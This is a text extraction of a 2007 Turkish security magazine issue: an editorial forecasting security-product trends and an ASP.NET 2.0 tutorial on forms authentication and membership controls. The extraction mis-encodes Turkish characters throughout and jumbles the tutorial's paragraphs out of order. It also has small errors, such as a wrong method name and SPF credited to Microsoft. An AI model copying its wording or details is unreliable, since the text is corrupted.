ABONE SiSTEMiMiZ DE⁄ifiiYOR
Transkript
ABONE SiSTEMiMiZ DE⁄ifiiYOR
B‹LG‹ GÜVENL‹G‹ PLATFORMU syf: 3 ABONE SiSTEM DE⁄ifiiYiMiZ OR LÜTFE KAYIT N OLUN • B‹LG‹ S‹STEMLER‹ VE R‹SK YÖNET‹M‹ • MICROSOFT GÜVENL‹K STRATEJ‹S‹ • MCAFEE S‹STEM GÜVEN‹K YÖNET‹M‹ • DATA LOSS PREVENTION • CAPTCHA • VISTA GÜVENL‹⁄‹ • UNDERGROUND Abone sistemimiz de¤ifliyor, lütfen kay›t olun... fiubat 2007 ‹mtiyaz Sahibi Sinan Y›lmaz Sorumlu Müdür Erkan fien Yay›n Dan›flman› Mehmet Ersin Da¤l› Yay›n Kurulu Caner Da¤l›, Erkan fien, Serkan Akcan, Sinan Y›lmaz Editor Attila Bilir Grafik Tasar›m Erden Gümüflçü ‹dari ‹fller Koordinatörü Serkan Akcan Bu Say›ya Katk›da Bulunanlar Arma¤an Zalo¤lu, Bora Dal, Cankat Domaniç, Coflkun Kamilo¤lu, Erkan fien, Esra Mutlu, Göksel Topbafl, Hakan Ünsal, Mehmet Üner, Mehmet Emre, Murat Lostar, Murat Özdemir, Serkan Akcan, Serkan Ak›n, Sinan Y›lmaz, Tunç Çokkeser, Tunç Günergün, Umut Ayd›n ‹LAN Yönetim Yeri Mecidiyeköy ‹fl Merkezi fiehit Ahmet Sokak No:4 Kat:12 D:121 Mecidiyeköy / ‹stanbul www.beyazsapka.org [email protected] De¤erli okurumuz, Öncelikle Beyaz fiapka projemize gösterdi¤iniz yo¤un ilgi için teflekkür ederiz. Türkiye’de bilgi güvenli¤ine katk›da bulunmak hepimize sonsuz bir mutluluk veriyor. Beyaz fiapka, destekleriniz sayesinde içeri¤ini gelifltirerek büyümeye devam edecek. Düflündü¤ümüzden çok daha h›zl› büyüyen Beyaz fiapka’n›n abonelik sistemini yönetmekte baz› zorluklar yaflamaya bafllad›k. Her say›da ortalama 50 kadar abonemiz ifl ya da adres de¤ifltiriyor. Yine her say›da ortalama 200 kadar yeni abone baflvurusu al›yoruz. Ayr›ca abonelerimizden Beyaz fiapka’y› etkileflimli bir altyap›yla bilgi güvenli¤i uzmanlar›n› bir araya getirmemiz gerekti¤ini belirten onlarca elektronik posta ald›k. Dolay›s› ile abonelik sistemimizde de¤ifliklik yap›yoruz. Dergi da¤›t›m listesinin yönetimini kolaylaflt›rmak için her Beyaz fiapka abonesinin internet sitemizden yeniden kay›t olmas›n› bekliyoruz. Kay›t s›ras›nda her abonemize bir kullan›c› ad› ve flifre verece¤iz. May›s 2007 say›s›ndan itibaren, web sitemizde kay›t yaratmam›fl kiflilere maalesef dergi gönderimi yapamayaca¤›z. Beyaz fiapka abonelerimiz bu sistem sayesinde ifl ve adres de¤iflikliklerini web sitemizden kendileri yapabilecekler. Dolay›s› ile sizlerden web sitemizden yeni abone kayd› yaratman›z› rica ediyoruz. Hepimizin tek amac› sistemlerimizin ya da müflterilerimizin güvenli¤ini sa¤lamak… Ancak tüm bunlar›n ötesinde hepimizin sosyal sorumluklar› oldu¤una inan›yoruz. Ülkemizin ihtiyaç duydu¤u konularda sosyal yard›mlaflmay› desteklemeyi bir görev biliyoruz. Bu sebeple dergimizin her say›s›nda sosyal sorumluluk projelerine yer verece¤iz. Bask› Promat Bas›m Yay›n San ve Tic A.fi. Tel: (212) 456 63 63 Adile Naflit Bulvar› 122. Sokak No:8 34513 Esenyurt ‹STANBUL Her zaman söyledi¤imiz gibi lütfen fikirlerinizi bizimle paylafl›n. Çünkü Beyaz fiapka hepimizin... Yay›n Türü Yayg›n Süreli, 3 Ayda bir yay›nlan›r içindekiler ÜCRETS‹ZD‹R, PARA ‹LE SATILMAZ. 04 >> Bilgi Güvenli¤inde Vizyon Türkiye’de bilgi güvenli¤i pazar›n›n gelece¤i Ana Sponsorlar nebula Beyaz fiapka Yönetimi [email protected] 06 >> Web Projelerinde Kimlik Do¤rulama ve Rol Tabanl› Yetkilendirme Web uygulamalar›nda h›zl› ve güvenilir hesap yönetimi Kat›l›mc› Sponsorlar Web Sitesi Tasar›m ve Programlamas› Da¤›t›m Aktif Da¤›t›m ‹letiflim Hizmetleri Pazarlama San ve Tic A.fi. Beyaz fiapka… ücretsiz olarak abonelerine da¤›t›l›r marka ba¤›ms›zd›r sayfalar› okuyucular›na aç›kt›r bilgiye yöneliktir bilgi güvenli¤ine önem veren sponsorlar›n›n katk›s› ile okuyucular›na ulafl›r üç ayda bir yay›nlan›r Nebula Biliflim Sistemleri San ve Tic Ltd fiti taraf›ndan ücretsiz da¤›t›l›r. 28 >> A¤ ve Uygulama H›zland›rma Wide Area Network yap›s›nda mevcut iletiflimi ve uygulamalar› h›zland›rmak 30 >> Forefront Security for Exchange Server Microsoft Exchange alt yap›lar›na etkin ve yüksek performansl› güvenlik çözümü 10 >> McAfee Sistem Güvenlik Yönetimi McAfee’nin merkezi güvenlik yönetim, politika yürütme ve raporlama arac›, ePO 32 >> Data Loss Prevention DLP nedir? Ne de¤ildir? 14 >> Biliflim Sistemeleri ve Risk Yönetimi Biliflim sistemlerinde risk de¤erlendirmesi 34 >> CAPTCHA Basit tasarlanm›fl web güvenli¤i 16 >> Windows Vista Güvenlik Özellikleri Vista’n›n 4 ana bafll›kta toplanm›fl geliflmifl güvenlik teknolojileri 35 >> Güvenlik Portal›na Davet Türkçe bilgi güvenli¤i portal› guvenlik.info 20 >> Underground MSF ile atak simülasyonu 36 >> Microsoft Certificate Lifecycle Manager Microsoft’un yeni sertifika yönetim arac› 22 >> Microsoft Güvenlik Stratejisi Microsoft’un güvenlik teknolojilerine bak›fl› 38 >> Bilgi Güvenli¤inde Kapsam Seçimi BGYS kurman›n ilk ad›m› 24 >> Sizde “Sanctum” var m›? Etkin bir veritaban› güvenli¤i sistemi modeli 39 >> KISA...KISA...KISA Sektörden haberler flubat 2007 beyazflapka 03 Serkan AKCAN [email protected] Bilgi Güvenli¤inde Vizyon üphesiz vizyon sahibi kifliler ve kurumlar›n baflar›ya ulaflma ihtimalleri di¤erlerine göre daha yüksektir. Ancak vizyon tan›m› farkl› mecralarda farkl› anlamlar tafl›yabiliyor. Örne¤in üniversitelerin iflletme derslerinin ço¤unda vizyonun bireysel bir görüfl bütünü oldu¤u, flirketlerin ya da organizasyonlar›n vizyonu olamayaca¤› söylenir. Oysa ifl dan›flmanlar› Kurumsal Vizyon gelifltirme hizmetleri vermektedir. Kurumsal dan›flmanlar vizyonu genelde ikiye ay›r›r: flimdiki vizyon ve gelecek vizyonu. Ben en iyisi “vizyon sahibi” kavram› üzerinde duray›m, kavram›n da Türk Dil Kurumu sözlü¤ünde nas›l geçti¤ini yazay›m. fi Vizyon Sahibi: Genifl görüfllü, ileri görüfllü, ufku genifl kimse. Vizyon ile bilgi güvenli¤i aras›ndaki ba¤lant›y› 3 temel ad›mda ortaya koyabiliriz. Üretici Vizyonu Üreticiler bilgi güvenli¤inde gelecek zamanlarda ortaya ç›kacak tehditleri düflünür ve ürünlerini bu yönde gelifltirir. Ancak bu sayede müflterilerine katma de¤erli hizmetler üretebilirler. Pazar araflt›rmalar› ile yat›r›m karar› desteklenir ve ürünler piyasaya sürülür. ‹fl Orta¤› Vizyonu Biz hem üreticilerin hem de müflterilerimizin ifl orta¤›y›z. Bizim gibi biliflim sektörünün hizmet taraf›nda bulunan flirketlerin belki de tek hedefi müflteri memnuniyetidir (en az›ndan bence öyle olmal›d›r). Ancak müflteri memnuniyeti bir sonuçtur, müflteriyi gelecek teknolojilere haz›rlamak ve bu konuda donan›ml› olmak ön flartt›r. Son Kullan›c› Vizyonu Türkiye’de en zay›f halka olarak gördü¤üm konu, son kullan›c› vizyonu. Ticaret flekli ve yasal düzenlemeler (ihale kanunlar›, sat›n alma prosedürleri vs.), ço¤u zaman flirketlerin teknoloji al›mlar›ndaki vizyonunu arka plana itiyor. 10 y›l› aflk›n biliflim sektörü tecrübemde mevcut kurallar sebebi ile son kullan›c›lardaki teknik uzmanlar›n istemedikleri ürün, teknoloji veya hizmetleri sat›n almak zorunda kald›¤›n› defalarca gördüm. Benim sorumlulu¤um elbette daha çok ifl ortaklar›n›n vizyonu çerçevesinde. Bugünkü vizyonumuz için Network IPS, Host IPS, SSLVPN, Security Management, 2 Factor Authentication, Vulnerability Assessment ve Risk Management gibi oldukça yüklü bir teknoloji yat›r›m› yapt›k ve bu ürünlerin tamam›n› kullan›yoruz. Tek amac›m›z teknik ekibimizin bilgi ve tecrübesini maksimum seviyede tutmak. Gelecek vizyonumuz ise yar›n talep edilecek ürün ve hizmetleri tespit etmek, gerekli yat›r›mlar› yapmak ve yar›nlara flimdiden haz›r olmak üzerine kurulu. 04 beyazflapka flubat 2007 Bu yaz›da “Bilgi Güvenli¤i” konusunda gelecek vizyonuna nas›l bakt›¤›m› anlatmaya çal›flay›m dedim ama biraz uzun bir önsöz oldu. Gelecek zamanlarda karfl›m›za ç›kacak olan tehditleri ve bu tehditlerle nas›l mücadele edece¤imizi düflünmek, bu alanlara yat›r›m yaparak müflterilerimize do¤ru çözümler sunmak zorunday›m. Hepimiz bu konuda düflünmeliyiz, çünkü flirketimizin yar›nlar›n› ancak bu sayede güvende tutabiliriz. 2007 y›l›n›n bu ilk günlerinde bizce güvenlik teknolojilerinin nas›l bir gelece¤e sahip oldu¤unu ve Türkiye pazar›n›n mevcut teknolojilere adaptasyon sürecini bir beyin f›rt›nas› yaparak ortaya koymaya çal›flal›m. Beyaz fiapka’n›n önceki say›lar›nda da yer ald›¤› gibi, ataklar a¤ ve uygulama seviyesine do¤ru kayd›. Yani güvenli¤imizin bu taraf›na biraz daha öncelik vermeliyiz. A¤ seviyesinde Network IPS projeleri h›zla yürümeye devam ediyor ama uygulama güvenli¤i taraf›nda büyük bir geliflme yok. 2007 y›l›nda uygulama güvenli¤i taraf›nda güvenli kod gelifltirme, Application Firewall ve uygulama güvenlik taramas› hizmetlerinde önemli art›fllar bekliyorum. Network IPS ürünleri biraz daha küçük sistemlerde projelendirilecek diye umarken Application Firewall teknolojilerinin büyük flirketlere h›zla girece¤ini san›yorum. Sektörün üretici taraf›nda ise önemli güvenlik üreticilerinin Application Firewall ürünleri gelifltirmesi ya da var olan baflka flirketleri sat›n almas› beni flafl›rtmayacak. Hatta birkaç sene sonra Network IPS teknolojisi ile Application Firewall teknolojisinin ya da Network Firewall ile Application Firewall ürünlerinin ayn› donan›mlar üzerinde birlikte çal›flt›¤›n› görürsek flafl›rmayal›m. Klasik Network Firewall ürünleri güvenlik sa¤lamakta çok yeterli de¤ildir. Y›llard›r bunu söyleyip dururken, Unified Threat Management (UTM) ürünleri h›zla yay›l›p beni hakl› ç›kard›. UTM cihazlar› tek kutu üzerinde Firewall, IPS, Antivirus ve Antispam gibi teknolojileri çal›flt›rabiliyor. Ancak her zaman söyledi¤im gibi, UTM cihazlar›n›n her bir özelli¤i k›s›tland›r›lm›flt›r. Dolay›s› ile UTM cihazlar› daha ziyada küçük sistemlere yay›lacak, büyük sistemlerde her bir güvenlik teknolojisi ayr› ürünler olarak çal›flacak. Secure Content Management (SCM) ad›na henüz Türkiye al›flamad›. Hala birço¤umuz bu ürünlere ‘gateway antivirus’ gözüyle bak›yoruz. Ancak bilgi güvenli¤i sektöründe SCM art›k bir ürün grubu haline geldi. Hatta global araflt›rma flirketleri SCM ürün grubu için pazar araflt›rmalar› yapar oldu. SCM a¤›m›zda önemli bir güvenlik noktas› oluflturuyor. Elektronik posta sunucular›m›z›n yükünü %70 oran›nda azalt›yor. HTTP, FTP ve POP3 gibi protokollerden do¤an ataklar› engelleyebiliyor. Önümüzdeki aylarda SCM ürünlerine basit atak engelleme imzalar› eklenebilir. Hatta önümüzdeki y›llarda SCM ürünleri büyük sistemler için spesifik protokollerde çal›flmak üzere tasarlanabilir. Örne¤in sadece SMTP için çok daha geliflmifl SCM, sadece HTTP için çok daha geliflmifl SCM gibi... Spam postalar hepimizin ortak derdi. Ba¤›ms›z Antispam ürünleri de var, SCM ürünlerine entegre ürünler de. Spam mücadelesinde Karantina Yönetimi a¤›rl›k kazanacak. Her ne kadar spam tan›mlama baflar›s› günden güne artsa da, bu ifle internet otoritelerinin kesin bir çözüm getirmesi gerekti¤ini ve getirece¤ini düflünüyorum. Microsoft, Sender Policy Framework (SFP) ile bu konuda bir ad›m att› ancak biliflim sektörü bunu çok hazmetmifl gibi görünmüyor. Ben daha ziyade dijital imza temelli bir kesin çözüm ortaya konaca¤›na inan›yorum. Ancak bu çok yak›n bir gelecekte olmayacakt›r. Google’dan bilgi güvenli¤i harcamalar› ile ilgili bir araflt›rma yapt›m. Özellikle kuzey Amerika’da kimlik do¤rulama teknolojilerinin sat›fl rakamlar› flafl›rt›c› derecede yüksek. Nedeni ise çok basit: güvenlik ihlallerinin çok büyük bölümü zay›f flifre politikas›, zay›f kimlik denetimi nedeniyle ortaya ç›k›yor. Sadece kimlik do¤rulama olarak baksak bile ürünler çok ucuz yaz›lmaz. Kullan›c› bafl›na 50-100$ gibi maliyetler söz konusu olabiliyor. Ancak sisteme eriflim bilgilerimiz bu rakamdan daha düflük bir öneme sahip de¤il ki? Single Sign-On (SSO) çözümlerini düflünürsek maliyet daha da artabilir. Yine de Türkiye’de pek de¤erini bulamam›fl olan kimlik do¤rulama çözümlerinin 2007 y›l› içerisinde önemli derecede artaca¤›n› düflünüyorum. ADSL hizmetinin yay›lmas› ile internet kullan›c›s› say›s› önemli derecede artt›. Eskiden sadece bir web sunucusu ile yürütülen hizmetler art›k dört-befl sunucu ile yap›l›yor. Metro Ethernet altyap›s› bant geniflliklerini önemli derecede artt›rmaya bafllad›. Load Balancing ve SSL Acceleration taraf›nda yap›lan projeler zaten 2006 y›l›nda artmaya bafllad›. 2007 y›l›nda Application Acceleration çözümlerinin de h›zla artarak yay›laca¤›n› düflünüyorum. Dünyan›n en büyük kurumsal dan›flmanl›k flirketlerinden birinin çal›flan›, dünyan›n en büyük biliflim üreticilerinden birinin çal›flanlar›na ait önemli bilgiler tafl›yan CD’yi çald›rd›. Türkiye’de bu h›rs›zl›¤›n önemi çok anlafl›lamayabilir. Fakat Amerikan kanunlar›na göre bu bilgilerin çal›nmas›, sat›lmas› ve kullan›lmas› çok büyük bir suç. Benzer durumlar Türk flirketlerinde de oluyor. Bugüne kadar proje dokümanlar›n› çald›rm›fl, önemli dokümanlar›n bir köstebek taraf›ndan s›zd›r›ld›¤›n› düflünen, dizüstü bilgisayar›n› çald›rm›fl ve içerisinde önemli bilgiler oldu¤unu söyleyen yüzlerce müflteri gördüm. Bu gibi s›k›nt›lara bilgi güvenli¤i üreticileri çözüm getirmifl durumda. 2007 y›l›ndan itibaren hayat›m›za yeni bir güvenlik teknolojisi girecek, Data Loss Prevention (DLP). DLP ürünleri bilgisayarlarda bulunan gizli ve kritik bilgilerin d›fl ortamlara tafl›nmas›n› engelliyor. DLP ile korunan bilgileri CD’ye ya da USB belleklere kopyalamak, e-posta eki olarak baflkalar›na göndermek, an›nda mesajlaflma yaz›l›mlar› ile baflka sistemlere transfer etmek, yazd›r›lmas›n› ya da fakslanmas›n› engellemek mümkün. NAC teknolojisi sürekli kafamda soru iflareti uyand›r›yor. Managed ve unmanaged sistemlerde NAC teknolojisini yürütmek çok zor. Ben en bafl›ndan beri NAC teknolojisinin çok yay›lamayaca¤›n› düflündüm. Microsoft bu ifle elini att›¤›nda iflin çehresi bir miktar de¤iflecek gibi. Longhorn ile gelecek olan Microsoft NAP sektörde bir standart haline gelebilir. Yine de NAC ürünlerinin, harcanan iflletim eme¤ine karfl›l›k gelebilecek bir fayda yaratt›¤›n› düflünmüyorum ve her müflteride söyledi¤im laf›m› bu sayfada sizlerle paylaflmak istiyorum: Prevention First! Türkiye’de ne kadar pazara sahip olaca¤›n› kestiremedi¤im bir tek ürün grubu var, o da Policy Management (Policy Auditing ve Compliance Analysis gibi isimleri de bu kategoriye dahil ediyorum). Güvenlik ve kural denetimi yapan bu ürünler genifl bir tabanda denetim ve raporlama yapabiliyor. Ancak nedendir bilinmez, Türkiye pazar› bu tarz ürünlere pek s›cak bakm›yor. Özellikle Amerikan flirketleri pek gönüllü olmasalar da bu ürünleri kullanmak zorunda kal›yor. Nitekim HIPAA, SOX, PCI gibi onlarca uyulmas› gereken ve s›k› denetimi yap›lan standart var ve bu ürünler standartlar›n tamam›na uyum sa¤layan denetimler yapabiliyor, raporlar üretebiliyor. Türkiye’de özellikle Finans gibi sektörel denetim sistemi geliflmifl pazarlarda bu gibi yaz›l›mlar kullan›lacakt›r diye düflünüyorum. Ne kadar çok üründen ve teknolojiden bahsettik de¤il mi? Kim yönetecek bunca ürünü, kim raporlayacak? Güvenlik sistemleri gelifltikçe ve kullan›lan ürün say›s› artt›kça mecburen Enterprise Security Management (ESM) ürünlerine yönelece¤iz, baflka çaremiz yok. ESM ürünleri farkl› ifller yapan birçok biliflim ve güvenlik sisteminden bilgi toplay›p yorumluyor ve bize anlaml› raporlar üretebiliyor. ESM sayesinde tek merkezden risk haritam›z› görüp acil önlemler üretebiliyoruz. Bu yaz›ma s›¤d›ramad›¤›m Automated Remedition, Risk Management, Mobile Device Security, Encryption gibi konular da var. Ancak temelde anlatmaya çal›flt›¤›m fley flu ki; her birimiz çal›flt›¤›m›z kurumun güvenli¤ini sa¤lamakla yükümlüyüz. Sorumluluklar paylaflt›r›labilir ancak devredilemez. Yar›n›n risklerini bugünden düflünmek, sistemimizin ve flirketimizin gelece¤ini garanti alt›na alacakt›r. Bu sayede kolay kazan›lamayan para, daha mant›kl› yat›r›mlara kayd›r›labilir ve yat›r›m geri dönüfl h›z› artt›r›labilir. Biliflim güvenli¤ini sa¤laman›n rahatl›¤› bir köflede dursun, güvenilir sistemlerimiz sayesinde müflterilerimizin memnuniyetini artt›rabilir, çetin rekabet koflullar›nda rakiplerimizden bir ad›m ileride olabiliriz. Yar›nlar›n›z güvenli olsun. flubat 2007 beyazflapka 05 Mehmet EMRE [email protected] ASP.NET 2.0 Web Projelerinde Kimlik Do¤rulama ve Rol Tabanl› Yetkilendirme elifltirdi¤imiz web projelerinin birço¤unda ortak ifllevsellik olarak, kimlik do¤rulaman›n oldu¤unu görürüz. Kimlik do¤rulama, site ziyaretçilerine özellefltirilmifl servisler sunmam›z ve site içinde sundu¤umuz bu ifllevselli¤i yetkilendirmemizi mümkün k›lar. Birçok web sitesinde anonim kullan›c›lar ve kay›tl› kullan›c›lar›n web sitesi içinde kullanabilecekleri ifllevsellik farkl›d›r. Anonim kullan›c›lara k›s›tl› bir ifllevsellik seti sunulurken, kay›tl› kullan›c›lara çok daha zengin seçenekler sunulmaktad›r. G Web sitemize basit anlamda bir kimlik do¤rulama ve yetkilendirme ifllevselli¤i eklemek için her projemizde baz› ad›mlar izleriz: • Kullan›c› kimlik bilgilerinin tutuldu¤u bir veritaban› tablosunun oluflturulmas› • Kullan›c› kimlik bilgilerinin (Kullan›c› kodu, flifre vb) al›nd›¤› ve kullan›c› tablosundaki bilgiler do¤rultusunda do¤ruland›¤› bir kimlik do¤rulama sayfas› • Kay›tl› kullan›c›lar için sunulan site üzerinde kullan›c› dolafl›rken, ilgili kullan›c›n›n kimlik bilgilerinin o oturum için do¤rulanm›fl oldu¤unu kay›t alt›na alan bir sistemin oluflturulmas› • Kay›tl› kullan›c›lar taraf›ndan ziyaret edilebilecek sayfalar›n sisteme girilmesi ve yetkilendirmenin yap›lmas› • ‹ste¤e ba¤l› olarak anonim kullan›c›lar›n siteye kay›t olabilmeleri için yeni kullan›c› oluflturma ifllevselli¤inin sa¤lanmas› • Site yöneticilerinin kay›tl› kullan›c›lar ile ilgili yönetimsel ifllemleri yapabildikleri bir yap›n›n kurulmas› rak kald›. ASP.NET 2.0 ile gelen üyelik sistemi (Membership System) ve bununla ilintili çal›flan web kontrolleri yukar›da ad›m ad›m s›ralad›¤›m›z tüm ifllemleri çok kolay bir flekilde yapmam›z için ihtiyaç duydu¤umuz alt yap›y› bizlere sunmakta. Form Tabanl› Kimlik Do¤rulama – ‹lk Ad›m ASP.NET öncesi web yaz›l›mc›lar› kimlik do¤rulama ve yetkilendirmeyle ilgili tasar›m kararlar›n› kendileri almak ve bunlar› uygulamak durumundayd›lar. Örnek vermek gerekirse, sistemde tan›ml› bir kullan›c› kodu ve flifresiyle sisteme girifl yapan ve kimlik bilgileri do¤rulanan bir kullan›c›n›n sitede dolafl›rken kimlik do¤rulamadan geçti¤i bilgisinin, di¤er bir ifadeyle kay›tl› kullan›c› oturum bilgisinin, sistemde bir flekilde tutulmas› gerekmekteydi. Yap›lmas› gereken ifllerden biri de siteye girifl yap›ld›ktan sonra ilgili kullan›c›n›n yetkilerinin tutulmas›, bu yetkiler do¤rultusunda web sitesinin ilgili ifllevselli¤ini kullanabilmesini sa¤lamak için gerekli kod, yaz›l›mc›lar taraf›ndan tasarlanmak ve yaz›lmak durumdayd›. Bu, ASP.NET öncesinde tan›mlanan bir oturum de¤iflkeni (Session Variable) tutularak ve her sayfa bafl›nda bu oturum de¤iflkeni yard›m›yla kullan›c›n›n kimlik do¤rulamadan geçip geçmemesi kontrol edilerek yap›l›rd›. Yine her sayfa giriflinde yaz›lan kodlar ile kullan›c›n›n bu sayfay› görüntülemeye yetkili olup olmad›¤› belirlenirdi. ASP.NET 1.0 ve 1.1 ile gelen form tabanl› kimlik do¤rulama (Forms-based authentication) kullan›c› hesaplar›n›n kolay bir flekilde uygulanmas›n› ve yetkilendirme bilgisinin, web uygulamas›n›n konfigürasyon dosyas› içinde (web.config) tutulmas›n› mümkün k›ld›. Form tabanl› kimlik do¤rulamada oluflturulan do¤rulama bileti (Authentication Ticket), kullan›c›n›n internet taray›c›s› üzerinde çerez içinde tutularak siteyi ziyaret eden kiflinin farkl› sayfalar aras›nda dolafl›rken kimlik bilgilerinin tafl›nmas›n› mümkün k›lar. FormsAuthentication s›n›f› da sundu¤u metodlarla do¤rulama bileti al›nmas›n› ve bunun site ç›k›fl›nda yok edilmesini sa¤lar. ASP.NET 1.0 ve 1.1 ile gelen form tabanl› kimlik do¤rulama, web sitelerinin bu ihtiyaçlar›n› karfl›lamak için standart bir yaklafl›m getirmekle beraber bu konuda yap›lmas› gereken birçok iflin tasar›m ve kodlamas› yaz›l›mc›lara b›rakm›flt›r. Örnek vermek gerekirse, kullan›c› kimlik ve flifre bilgilerinin tutulaca¤› veritaban› tablosunun tasar›m› ve oluflturulmas›, veritaban› tablosundaki bilgilerin güvenli bir flekilde saklanmas› vb. gibi. ASP.NET 2.0 Üyelik Sistemi ASP.NET 2.0 ile gelen üyelik sistemiyle daha önce ASP.NET 1.0 ve 1.1 ‘de ortaya konulan form tabanl› kimlik do¤rulama sisteminin üzerine yeni eklentiler getirilmifltir. ASP.NET 2.0 ile birlikte kullan›c› oluflturma, silme ve güncelleme ifllemlerinin programatik olarak yap›lmas› ve bu ifllemlerin haz›r olarak gelen web kontrolleriyle desteklenmesi sa¤lanm›flt›r. Böyle bak›ld›¤›nda ASP.NET 2.0 ile gelen yenilikler yeni üyelik uygulama gelifltirme arabirimleri (Membership API) ve güvenlik web kontrolleri olarak özetlenebilir. Üyelik uygulama gelifltirme arabirimleri (Membership API) sa¤lay›c› modeli (provider model) üzerine oturtulmufltur. Bu da arabirimlerin tan›mlamalar› sabit kalmak kayd›yla uygulaman›n istenildi¤inde özellefltirilebilece¤i anlam›na gelmektedir. Özellikle bilgilerin fakl› veri kaynaklar› üzerinde tutulabilmesi aç›s›ndan bu önemlidir. Membership s›n›f›n›n CreateUser(), GetAllUsers(), ValidateUser()vb. birçok metodu bulunmaktad›r. Uygulamada kullan›lacak Membership s›n›f› web uygulamas›n›n konfigürasyon dosyas› taraf›ndan belirlenir. Özellefltirilmifl bir Mem- Yukar›da bahsetti¤imiz maddeler bir web sitesi için kimlik do¤rulama ve yetkilendirme mekanizmas›n›n oluflturulmas›nda yap›lmas› gereken temel ifllemleri özetlemektedir. Farkl› projelerde, ifl gereksinimleri do¤rultusunda bu ifllemler detaylanabilir. ASP.NET öncesinde yaz›l›mc›lar, yukar›daki mekanizmalar›n tamam›n› kendileri oluflturmak durumundayd›lar. ASP.NET form tabanl› kimlik tan›ma (Forms-based authentication) sistemi ve FormsAuthentication s›n›f› sayesinde kimlik do¤rulama ve siteye girifl-ç›k›fl ifllemleri oldukça kolaylaflt›. ASP.NET ile gelen form tabanl› kimlik tan›ma, hayat›m›z› oldukça kolaylaflt›rmas›na ra¤men kullan›c› tablosunun oluflturulmas›, kimlik do¤rulama sayfas›n›n kodlanmas› (Login Page) gibi ifller hala yaz›l›mc›n›n yapmas› gereken ifller ola- 06 beyazflapka flubat 2007 flubat 2007 beyazflapka 07 ASP.NET 2.0 Web Projelerinde Kimlik Do¤rulama ve Rol Tabanl› Yetkilendirme bership yap›s›n› konfigürasyon dosyas›nda yap›lacak de¤iflikliklerle kullanmak mümkündür. ASP.NET 2.0; do¤rudan kullan›c› bilgilerini SQL Server veritaban›nda ya da Active Directory üzerinde tutman›z› sa¤layacak Membership Provider ile gelmektedir. Mevcut projedeki kullan›c› veriniz fakl› bir veri kayna¤›nda ise ya da yeni yapt›¤›n›z bir projedeki kullan›c› verilerinizi farkl› bir kaynakta tutmak isterseniz size sa¤lanan alt yap›yla ilgili veri kayna¤›na yönelik bir Membership Provider yazman›z mümkün. Kullan›c› Bilgilerinin Üyelik Sistemi ile SQL Server Üzerinde Tutulmas› l›r. Daha sonra Security Setup Wizard kullan›larak güvenlik ayarlar› yap›labilir. SqlMembershipProvider kullan›c› bilgilerini iki farkl› tablo üzerinde tutar: aspnet_Users: Her kay›tl› kullan›c› için bir sat›r tutulur. UserId sütunu, her kullan›c›n›n sistem içerisinde tekilli¤ini garanti alt›na al›r. UserId sütunu GUID olarak saklan›r. aspnet_Membership: UserId sütunu ile aspnet_Users tablosuna ba¤lan›r. Detay üyelik sistemi bilgileri (e-posta, güvenlik sorusu/cevab› vb.) bilgileri bu tabloda tutulur. ASP.NET 2.0 ile gelen Membership Provider‘lardan biri SqlMembershipProvider’d›r. Bu provider seçildi¤inde, kullan›c› bilgileri SQL Server üzerinde tutulur. Öncelikli olarak veritaban› flema do¤rultusunda oluflturulmal›d›r. Bunun için iki farkl› yöntem uygulanabilir. Güvenlik Web Kontrolleri ASP.NET Web Site Administration Tool‘un kullan›m›. fiema do¤rultusunda ASPNET.MDF dosyas› oluflturulup uygulaman›n App_Data dizinine koyulacakt›r. ASP.NET 2.0 içinde yeni gelen sunucu web kontrollerinden 7 tanesi güvenlik amaçl›d›r ve üyelik sistemi içinde kullan›c› tan›mlamalar› yapmam›z› kolaylaflt›r›r. ASP.NET SQL Server Registration Tool (aspnet_regsql.exe) komut sat›r› kullan›larak çal›flt›r›labilir. Böylelikle istenen SQL Server 2000 veya 2005 sunucusu üzerinde kullan›c› tablosu oluflturulabilir. Bu kontrollere k›saca bakacak olursak Login ASP.NET Web Site Administration Tool; Visual Studio 2005 içinden WebSite ASP.NET Configuration seçilerek kullan›- ASP.NET 2.0 ile birçok yeni web kontrolü gelmifltir. Burada hedef, birçok web projesinde tekrarlanarak yaz›lan kodlar›n web kontolleri içinde yaz›l›mc›ya sunulmas› ve yaz›l›mc› verimlili¤inin artt›r›lmas›d›r. Login kontrolü, standart kullan›c› ad› ve kodu ile siteye girifl yapmay› sa¤layan bir kontroldür. Log In dü¤mesine bas›ld›¤›nda Membership s›n›f›n›n VerifyUser (username, password) metodu çal›fl›r ve kimlik do¤rulama sa¤lan›r. E¤er verilen bilgiler do¤ru ise kullan›c›ya bir do¤rulama bileti sa¤lan›r, de¤ilse hata yine kontrolün kullan›c› arabirimi üzerinden dönülür. Kullan›c› bilgilerinin do¤ru olmad›¤› durumlarda özellefltirilmifl aksiyonlar› alabilmek için LoginError Event kullan›labilir. Özellefltirilmifl kimlik do¤rulama mekanizmalar› oluflturmak için Authenticate Event kullan›labilir. lan›c›n›n kay›tl› bir kullan›c› ya da anonim bir kullan›c› olma durumuna göre ilgili flablon üzerindeki içerik kullan›c›ya yönlendirilir. PasswordRecovery Bu kontrol, kay›tl› herhangi bir kullan›c›ya mevcut flifresinin ya da yeniledi¤i flifresinin gönderilmesini sa¤lar. LoginSatatus Bu kontrol, sitede anonim bir kullan›c› o anda aktif ise, login sayfas›na bir ba¤lant› içerir. Aktif kullan›c› kay›tl› ve kimlik kontrolünden geçmifl bir kullan›c› ise bu durumda siteden ç›k›fl (Logoff) linki gösterilir. CreateUserWizard Kullan›c› kodu ve flifresi ile girilen sitelerde genellikle bir de yeni kullan›c› oluflturma ekran›na ihtiyaç duyar›z. CreateUserWizard kontrolü, yeni kullan›c› oluflturma arayüzünü yazmam›z› oldukça kolaylaflt›r›r. Arkaplanda Membership s›n›f› CreateUser(...) metodu ça¤›r›l›r ve üyelik sistemi üzerinde kullan›c› oluflturma gerçeklefltirilir. Sonuç LoginName Bu kontrol, hiç kod yazmaks›z›n aktif kullan›c› ismini almam›z› sa¤lar. Ayn› fley User.Identity.Name API kullan›larak programatik olarak gerçeklefltirilebilir. ChangePassword Bu kontrol, kullan›c›lar›n flifrelerini de¤ifltirmelerini sa¤lar. ASP.NET 2.0 içinde gelen üyelik sistemi ve provider modeli, sunulan yeni sunucu web kontrolleriyle oluflturulacak web sitelerinde, kimlik do¤rulama ve yetkilendirmeyi oldukça kolay bir hale getirmektedir. Provider modelindeki esnek yap› ve sunulan API‘ler sayesinde, özellefltirilmifl kimlik do¤rulama ve yetkilendirme mekanizmalar› oluflturmak oldukça kolayd›r. LoginView Ço¤unlukla sitenizdeki web sayfas›nda kullan›c›n›n kay›tl› bir kullan›c› ya da anonim bir kullan›c› olma durumuna göre farkl› içerikler 